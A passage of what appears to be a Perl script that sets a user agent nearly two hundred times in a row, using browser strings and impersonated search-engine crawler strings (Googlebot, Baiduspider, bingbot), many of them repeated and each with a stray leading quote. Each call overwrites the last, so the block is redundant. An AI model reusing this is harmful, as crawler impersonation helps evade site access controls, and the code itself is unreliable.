  4870. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4871. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4872. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4873. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4874. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4875. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4876. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4877. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4878. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4879. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  4880. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  4881. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  4882. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4883. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  4884. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4885. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4886. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4887. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4888. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4889. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4890. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4891. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4892. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4893. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4894. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4895. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4896. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4897. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4898. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4899. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4900. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4901. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4902. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4903. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4904. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4905. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4906. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  4907. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  4908. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  4909. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  4910. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  4911. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  4912. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  4913. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  4914. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  4915. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  4916. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  4917. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  4918. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  4919. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4920. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  4921. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4922. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  4923. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  4924. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  4925. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  4926. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  4927. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  4928. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4929. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  4930. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  4931. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  4932. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  4933. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  4934. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  4935. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  4936. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  4937. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  4938. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  4939. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  4940. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  4941. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  4942. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  4943. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  4944. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  4945. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  4946. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  4947. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  4948. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  4949. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  4950. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  4951. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  4952. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  4953. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  4954. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  4955. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  4956. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  4957. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  4958. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  4959. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  4960. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  4961. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  4962. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  4963. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  4964. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  4965. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  4966. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  4967. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  4968. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  4969. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  4970. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  4971. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
  4972. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  4973. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
  4974. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  4975. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  4976. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  4977. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  4978. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  4979. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  4980. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
  4981. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  4982. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  4983. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  4984. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  4985. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)");
  4986. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4987. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4988. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4989. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4990. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4991. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4992. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4993. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4994. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4995. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4996. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4997. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4998. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4999. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5000. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5001. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  5002. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  5003. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5004. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5005. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  5006. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  5007. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5008. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5009. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5010. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  5011. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  5012. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  5013. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  5014. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  5015. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5016. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  5017. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5018. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  5019. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  5020. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  5021. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  5022. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  5023. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  5024. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  5025. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  5026. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  5027. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  5028. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  5029. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  5030. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  5031. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5032. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  5033. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5034. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  5035. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  5036. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  5037. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  5038. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  5039. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  5040. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5041. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  5042. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  5043. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  5044. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  5045. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  5046. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  5047. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  5048. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  5049. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  5050. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  5051. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  5052. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  5053. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  5054. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  5055. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  5056. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  5057. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  5058. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  5059. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  5060. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  5061. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  5062. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  5063. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  5064. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  5065. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  5066. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5067. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5068. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
